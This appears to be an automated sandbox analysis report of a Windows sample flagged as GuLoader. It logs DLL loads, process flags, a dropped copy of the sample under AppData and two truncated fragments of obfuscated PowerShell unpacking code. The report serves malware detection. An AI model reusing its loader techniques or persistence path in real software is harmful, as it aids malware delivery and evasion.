Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ugpJX5h56S.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2651878810.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.2662602628.000000000841D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Core.pdb]B source: powershell.exe, 00000002.00000002.2651878810.0000000002E56000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2665491862.000000000A6E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Mesothetic $Hexadecimalkode $Kajpladsen), (Juratidens24 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afskibningens = [AppDomain]::CurrentDomain.GetAssem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Arseniuretted)), $notifyee).DefineDynamicModule($Galactopoiesis, $false).DefineType($Hjemle, $Gascoigny, [System.MulticastDelegate])$t

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_047EE9F8 push eax; mov dword ptr [esp], edx	2_2_047EEA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0766E044 push edx; retf	2_2_0766E045
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C337E4 push esi; ret	6_2_00C337E5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C337E8 push esi; ret	6_2_00C337E9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
